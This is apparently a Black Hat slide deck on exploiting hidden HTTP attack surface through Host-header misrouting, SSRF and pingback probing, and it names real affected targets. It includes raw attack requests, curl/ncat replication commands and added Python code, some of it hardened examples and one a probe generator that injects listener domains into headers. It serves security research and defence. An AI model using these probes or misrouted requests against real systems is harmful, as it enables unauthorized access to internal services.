CRACKING THE LENS - Black Hat Briefings
CRACKING THE LENS
James Kettle
EXPLOITING HTTP'S HIDDEN ATTACK-SURFACE
An Unexpected Pingback – cloud.mail.ru / imgur.com
Pingback from bn-proxy1a.ealing.ukcore.bt.net
predator.alien.bt.co.uk
cloud.mail.ru:80 (HTTP)   cloud.mail.ru:443 (HTTPS)   258 bytes | 52 millis
Outline
• Speculative Attack Pipeline
• Misrouting Requests
• Targeting Auxiliary Systems
• Demo
• Q&A
Speculative Attack Pipeline
Listening
• DNS Listener
• Burp Collaborator Client
  • Private Collaborator server recommended
• Roll your own
• Canarytokens
Inviting Responses
• Burp match/replace
  • No correlation
• Collaborator Everywhere
• Masscan
  • No HTTP/1.1 or SSL/TLS
• ZMap/ZGrab
Lazily Assembling an Audience
(Pipeline diagram: HackerOne and BugCrowd program scopes → scope regex; DNS database (Project Sonar) → 3 million hosts → 50k web servers (IP address, hostname) → suitable target spreadsheet → profit)
Maximizing Attack Surface
GET / HTTP/1.1
Host: {host1, host2, host3}
X-Forwarded-Proto: {HTTPS, HTTP}
Cache-Control: no-transform
Max-Forwards: {1, 2, 3}
Misrouting Requests
(Diagram: REVERSE PROXY in front of PUBLIC APP and INTERNAL APP)
Misrouting Requests
GET / HTTP/1.1
Host: id.burpcollaborator.net

Exploited:
• 27 DoD servers
• ats-vm.lorax.bf1.yahoo.com
• My ISP
• Colombian ISP doing DNS poisoning
ats-vm.lorax.bf1.yahoo.com 1/3
ats-vm.lorax.bf1.yahoo.com 2/3
ats-vm.lorax.bf1.yahoo.com 3/3
+15,000 +5,000 $20,000
Investigating Intent - BT
• All TCP/80 traffic to blacklisted IPs gets proxied
• Masks all incoming BT traffic
• /0 traceroute (ttl=10)
• Caches, self-hosted sites, speedtests, and blacklisted IPs

GET / HTTP/1.1
Host: www.icefilms.info

HTTP/1.1 200 OK
…
<p>Access to the websites listed on this page has been blocked pursuant to orders of the high court.</p>

GET http://104.31.17.3/ HTTP/1.1
Host: www.icefilms.info

HTTP/1.1 200 OK
…
<title>IceFilms.info - Quality DivX Movies</title>
Investigating Intent - METROTEL
• vk.com pingback from 200.89.96.13
• DNS poisoning image hosts, social networks
• and bbc.co.uk
  • Which articles?
  • Perspectives/Convergence
  • Backslash Powered Diffing, ETag
"healthy internet"
Input Mangling
GET / HTTP/1.1
Host: vcap.me

GET /vcap.me/vcap.me
Host: outage.vcap.me
Via: o2-b.ycpi.tp2.yahoo.net

GET / HTTP/1.1
Host: ../?x=.vcap.me

GET /vcap.me/../?x=.vcap.me
Host: outage.vcap.me
Via: o2-b.ycpi.tp2.yahoo.net

+5,000 $25,000
Absolute URLs
GET http://blah/ HTTP/1.1
Host: one.mil

If you're looking at this and are not in the military or DoD this won't mean anything to you, nor will you be able to access it….
Ambiguous Exploits - Incapsula
Incapsula: hostname:ignoredPort
Backend: http://user:pass@hostname/

GET / HTTP/1.1
Host: incap-client:[email protected]
Apache HttpComponents
URL backendURL = new URL("http://backend-server/");
String uri = ctx.getRequest().getRawUri();   // request-target exactly as the client sent it
URI proxyUri = new URIBuilder(uri)           // attacker-controlled text becomes the base URI
    .setHost(backendURL.getHost())
    .setPort(backendURL.getPort())
    .build();

GET @burpcollab.net/ HTTP/1.1
http://[email protected]/
GET @burpcollaborator.net/ HTTP/1.1
Service-Gateway-Is-Newrelic-Admin: false
+8,000 $33,000
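The Incapsula and HttpComponents cases above are one bug class: the proxy assembles its upstream URL out of attacker-controlled text (the raw request-target, or a Host value spliced into http://user:pass@hostname/), and the URL parser then finds an "@" and treats everything before it as userinfo, so the attacker's name becomes the real host. The following is an added Python example, not code from the talk, from Incapsula or from Apache HttpComponents; it reproduces both shapes with urllib.parse and shows a builder that refuses them. The names backend-server, internal-app and attacker.example are placeholders; burpcollab.net is the listener name from the slide.

```python
"""Rebuilding an upstream URL from attacker-controlled request fields.

Added example: models the Incapsula and HttpComponents bug class in
Python with urllib.parse. 'backend-server', 'internal-app' and
'attacker.example' are placeholder names.
"""
import re
from urllib.parse import urlsplit

BACKEND = "http://backend-server"   # assumed internal upstream origin


def naive_proxy_url(raw_target: str) -> str:
    """Vulnerable: glue the upstream origin onto whatever request-target the
    client sent. A target of '@burpcollab.net/' makes 'backend-server' the
    URL userinfo and burpcollab.net the host the client will connect to."""
    return BACKEND + raw_target


def naive_host_url(host_header: str, user: str = "user", password: str = "pass") -> str:
    """Vulnerable: the Host header is spliced into a URL that already carries
    credentials (the http://user:pass@hostname/ shape on the Incapsula slide).
    The parser keeps the text after the LAST '@' as the host, so a Host value
    containing '@' swaps the destination."""
    return f"http://{user}:{password}@{host_header}/"


def upstream_host(url: str) -> str:
    """The host an HTTP client will actually connect to for this URL."""
    return urlsplit(url).hostname or ""


def strict_proxy_url(raw_target: str) -> str:
    """Hardened: accept only origin-form request-targets (RFC 7230 5.3.1):
    a single leading '/', no scheme, no authority. Anything else is refused
    before any URL is built, so '@' in the target can only ever land in the
    path, where it is harmless."""
    if not raw_target.startswith("/") or raw_target.startswith("//"):
        raise ValueError(f"refusing non-origin-form request-target: {raw_target!r}")
    parts = urlsplit(raw_target)
    if parts.scheme or parts.netloc:
        raise ValueError(f"request-target carries an authority: {raw_target!r}")
    return BACKEND + parts.path + (f"?{parts.query}" if parts.query else "")


def strict_host_url(host_header: str) -> str:
    """Hardened: validate Host as host[:port] before use. Credentials go in an
    Authorization header, never into the URL, so there is no userinfo for an
    attacker-supplied '@' to interact with."""
    host, _, port = host_header.partition(":")
    if not re.fullmatch(r"[A-Za-z0-9.-]+", host):
        raise ValueError(f"bad host in Host header: {host_header!r}")
    if port and not port.isdigit():
        raise ValueError(f"bad port in Host header: {host_header!r}")
    return f"http://{host}{':' + port if port else ''}/"


def rejected(builder, value: str) -> bool:
    """True if a hardened builder refuses `value` (helper for checks)."""
    try:
        builder(value)
    except ValueError:
        return True
    return False
```

The check that matters is `upstream_host()`: whatever string the proxy builds, the host the client library extracts from it is the one that receives the request and the credentials.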
GlobaLeaks
GET xyz.burpcollaborator.net:80/ HTTP/1.1
Host: demo.globaleaks.org

SSRF through Tor
xYZ.BurpcoLLABoRaTOR.neT. from 89.234.157.254
Xyz.burPColLABorAToR.nET. from 62.210.18.16
xYz.burpColLaBorATOR.net. from 91.224.149.254
Exploiting Auxiliary Systems
(Diagram: PUBLIC APP → BACKEND; ATTACKER APP)
"The X-Wap-Profile header should contain a URL pointing to an XML document specifying the features of a mobile device"
Decloaking Backend Systems
GET /?a=f.collab.net&a=f.collab.net HTTP/1.1
Host: www.facebook.com
X-WAP-Profile: http://a.collab.net/wap.xml
Referer: http://b.collab.net/ref
X-Forwarded-For: c.collab.net
True-Client-IP: d.collab.net
X-Real-IP: e.collab.net
Connection: close
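The request above and the permutation set on the "Maximizing Attack Surface" slide rely on the same bookkeeping: every injection point gets its own unique subdomain of a listener you control, so that a DNS or HTTP pingback arriving hours later can be traced to the target, header and request variant that planted it. The following is an added Python example of that bookkeeping, not code from the talk or from the Collaborator Everywhere extension. collab.example and www.example.org are placeholders; the header set is the one on the slide, and the Host-misrouting probe is the one from "Misrouting Requests".

```python
"""Per-injection-point pingback labels and their correlation.

Added example (not from the talk or Collaborator Everywhere). Builds
probe requests whose auxiliary headers, query parameter and, for the
misrouting probe, Host header each carry a unique listener subdomain,
and maps a name later seen by the listener back to its origin.
'collab.example' is a placeholder for a zone whose NS and web server
you operate.
"""
import secrets
from typing import Dict, List, Optional

LISTENER_DOMAIN = "collab.example"   # assumed: you control this zone

# Header templates from the 'Decloaking Backend Systems' slide; {label} is
# replaced by a unique name per target, header and request variant.
INJECTION_POINTS = [
    ("X-WAP-Profile", "http://{label}/wap.xml"),
    ("Referer", "http://{label}/ref"),
    ("X-Forwarded-For", "{label}"),
    ("True-Client-IP", "{label}"),
    ("X-Real-IP", "{label}"),
]


class ProbeSet:
    """Issues labels, builds probes, and attributes pingbacks to them."""

    def __init__(self, listener: str = LISTENER_DOMAIN) -> None:
        self.listener = listener.lower()
        self._labels: Dict[str, Dict[str, str]] = {}

    def _label(self, target: str, point: str, variant: str) -> str:
        # 48 random bits as lowercase hex: unguessable and DNS-safe. Matching
        # is case-insensitive because resolvers may apply 0x20 case mixing.
        lab = secrets.token_hex(6)
        self._labels[lab] = {"target": target, "point": point, "variant": variant}
        return f"{lab}.{self.listener}"

    def build(self, target: str, proto: str = "http", max_forwards: Optional[int] = None) -> bytes:
        """One raw HTTP/1.1 probe for `target`: a label in every auxiliary
        header and in a repeated query parameter, plus the X-Forwarded-Proto
        and Max-Forwards values that make different hops react."""
        variant = f"proto={proto},mf={max_forwards}"
        headers = [("Host", target)]
        for name, template in INJECTION_POINTS:
            headers.append((name, template.format(label=self._label(target, name, variant))))
        headers.append(("X-Forwarded-Proto", proto))
        headers.append(("Cache-Control", "no-transform"))   # discourage content-rewriting proxies
        if max_forwards is not None:
            headers.append(("Max-Forwards", str(max_forwards)))   # surfaces intermediate hops
        headers.append(("Connection", "close"))
        q = self._label(target, "query:a", variant)
        lines = [f"GET /?a={q}&a={q} HTTP/1.1"] + [f"{k}: {v}" for k, v in headers]
        return ("\r\n".join(lines) + "\r\n\r\n").encode()

    def build_host_probe(self, target: str) -> bytes:
        """The misrouting probe: a plain request whose Host is a label. Any
        lookup of that name means something in front of `target` resolved
        our Host header instead of serving its own virtual host."""
        host = self._label(target, "Host", "host-misrouting")
        return f"GET / HTTP/1.1\r\nHost: {host}\r\nConnection: close\r\n\r\n".encode()

    def variants(self, target: str) -> List[bytes]:
        """The permutation set from 'Maximizing Attack Surface': each
        X-Forwarded-Proto value crossed with Max-Forwards 1..3, plus the
        Host-misrouting probe."""
        out = [self.build(target, proto, mf) for proto in ("https", "http") for mf in (1, 2, 3)]
        out.append(self.build_host_probe(target))
        return out

    def attribute(self, seen_name: str) -> Optional[Dict[str, str]]:
        """Map a name the listener saw (DNS qname or HTTP Host) back to the
        probe that planted it; None for unrelated traffic."""
        name = seen_name.lower().rstrip(".")
        suffix = "." + self.listener
        if not name.endswith(suffix):
            return None
        label = name[: -len(suffix)].split(".")[-1]   # tolerate prepended components
        return self._labels.get(label)
```

Send the bytes from `variants()` over a raw socket or TLS connection to each target (the talk's "Replicating" commands show the transport), keep the `ProbeSet` around, and feed every name your listener logs into `attribute()`; a hit on an X-Forwarded-For label from a proto=https variant tells you which header a backend parsed as a hostname and under which conditions.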
Exploiting Remote Clients
• URL & Redirect handling
• Auto-authentication - Responder.py
• Client Heartbleed – pacemaker.py
• TCP/IP fingerprinting – p0f
• SSL ciphers, cert validation
Exploiting Remote Clients
• Pingback inception
• Spray RCE across LAN
• What if they're rendering?
  • Spray XSS across LAN - Blind Reflected Server-Side XSS (BRSSXSS)
  • XSS /proc/self/environ
• Do they support JavaScript? Or CSS? Do they enforce the SOP? Can I make popups? What about Flash?
Rendering Engine Hackability Probe
JavaScript environment difference: core, __core-js_shared__, System…
Pre-emptive Caching
• Load <history of blimps>
• Note GET /blimps/F-1.png HTTP/1.1
• Scanning response for resource imports

GET / HTTP/1.1
Host: burpcollaborator.net

GET /jquery.js HTTP/1.1
GET /wildcat.jpg HTTP/1.1

https://www.history.navy.mil/our-collections/photography/numerical-list-of-images/nhhc-series/nh-series/NH-43000/NH-43487.html
Escalating XSS to SSRF
(Diagram: REVERSE PROXY in front of PUBLIC APP and INTERNAL APP)
Escalating XSS to SSRF
(Sequence diagram, columns ATTACKER / PROXY / PUBLIC APP / INTERNAL)
ATTACKER → PROXY → PUBLIC APP: POST /XSS.cgi
  <img src="http://internal/index.php/a.jpg">
PUBLIC APP → PROXY: GET /index.php/a.jpg
PROXY → INTERNAL: GET /index.php/a.jpg
  Host: internal
INTERNAL → PROXY → PUBLIC APP: Sensitive content
PUBLIC APP → ATTACKER: Sensitive content
DEMO
Defense
• Reverse proxies are going to proxy
  • Use a DMZ
• Crawlers are employees with antiquated browsers who click everything
• Welcome researchers
  • Have a bug bounty
  • Don't forbid automated testing (with custom tools)
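The "Misrouting Requests", "Investigating Intent - BT", "Absolute URLs" and "Escalating XSS to SSRF" slides all come down to one question: which host does a request really name, and does the proxy forward to that host or to whatever the Host header says? The following added Python example (not code from the talk) parses those request shapes, computes the effective target per RFC 7230, and contrasts a proxy that behaves like the ones on the slides with one that follows the "use a DMZ" advice: public names only, Host rewritten to match an absolute-form target, 421 for everything else. The route table, the blocklist and 203.0.113.5 (standing in for the real IP on the BT slide) are constructed for the example.

```python
"""Reverse-proxy routing: what the request says vs. what the proxy does.

Added example (not from the talk). The vhost tables, blocklist and the
203.0.113.5 address are constructed for illustration.
"""
from dataclasses import dataclass
from typing import List, Optional, Tuple
from urllib.parse import urlsplit


@dataclass
class Request:
    method: str
    target: str                         # request-target exactly as sent
    headers: List[Tuple[str, str]]

    def header(self, name: str) -> Optional[str]:
        return next((v for k, v in self.headers if k.lower() == name.lower()), None)


def parse_request(raw: bytes) -> Request:
    """Parse the head of an HTTP/1.x request (CRLF or bare LF line endings)."""
    head = raw.decode("iso-8859-1").replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = head.split("\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = []
    for line in lines[1:]:
        if line:
            name, _, value = line.partition(":")
            headers.append((name.strip(), value.strip()))
    return Request(method, target, headers)


def effective_target(req: Request) -> Tuple[str, str]:
    """(host, path) the request is really for. RFC 7230 section 5.5: an
    absolute-form request-target takes precedence over the Host header."""
    u = urlsplit(req.target)
    if u.scheme and u.netloc:                       # absolute-form
        path = (u.path or "/") + (f"?{u.query}" if u.query else "")
        return u.netloc.lower(), path
    return (req.header("Host") or "").lower(), req.target


# Constructed configuration for the two proxies below.
BLOCKED_HOSTS = {"www.icefilms.info"}              # the ISP's court-order list
PUBLIC_VHOSTS = {"www.example.org": "public-app:8080", "api.example.org": "api-app:8080"}
INTERNAL_VHOSTS = {"internal": "internal-app:80"}  # meant to be reachable only from inside

Decision = Tuple[str, Optional[str], Optional[str]]   # (action, upstream, Host sent upstream)


def proxy_naive(raw: bytes) -> Decision:
    """Vulnerable. The block check uses the effective target, but the request
    is forwarded unchanged, so the upstream still sees the original Host
    header (the BT bypass). Unknown hosts are not refused: the proxy resolves
    and connects to whatever Host names (the DNS pingback on the 'Misrouting
    Requests' slide), and public and internal vhosts share one listener, so
    'Host: internal' from a rendered <img> is routed like any other name."""
    req = parse_request(raw)
    host, _ = effective_target(req)
    if host in BLOCKED_HOSTS:
        return ("blocked", None, None)
    upstream = {**PUBLIC_VHOSTS, **INTERNAL_VHOSTS}.get(host, host)
    return ("forward", upstream, req.header("Host"))


def proxy_strict(raw: bytes) -> Decision:
    """Hardened. Host is rewritten to the effective target (RFC 7230 section
    5.4 requires a proxy to do this for absolute-form requests), so filter and
    upstream agree; only the public allowlist is routed and everything else
    gets 421 Misdirected Request. Internal apps are not in this table at all:
    they sit behind a separate listener in the DMZ."""
    req = parse_request(raw)
    host, _ = effective_target(req)
    if host in BLOCKED_HOSTS:
        return ("blocked", None, None)
    upstream = PUBLIC_VHOSTS.get(host)
    if upstream is None:
        return ("421", None, None)
    return ("forward", upstream, host)
```

Run the same bytes through both: the absolute-form request with a blocked Host header, the collaborator Host, and the `Host: internal` fetch from the XSS-to-SSRF diagram are all forwarded by `proxy_naive` and all refused by `proxy_strict`, while an ordinary request for a public name is routed identically by both.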
Replicating
# Host-header misrouting over plain HTTP
curl -H 'Host: internal' http://example.com/
# raw request over TCP (the header block must end with an empty line)
echo -e 'GET / HTTP/1.1\r\nHost: example.com\r\n\r\n' | ncat example.com 80
# the same raw request over TLS to a specific IP
echo -e 'GET / HTTP/1.1\r\nHost: example.com\r\n\r\n' | openssl s_client -ign_eof -connect 7.7.7.7:443
# SNI that does not match the IP's expected hostname
openssl s_client -servername qq.com -ign_eof -connect 7.7.7.7:443

https://github.com/PortSwigger/collaborator-everywhere
https://github.com/PortSwigger/hackability
Further Research
• ZGrab + Burp Collaborator integration
• X-WAP-Profile's friends
• Client exploits
• Tools for automated exploitation (especially blind SSRF)
• Untapped attack surface
  • The other layer
Takeaways
Bug bounties enable whitehat research at scale
Load balancers are VPNs for the public
Crawlers are employees who click

@albinowax   Email: [email protected]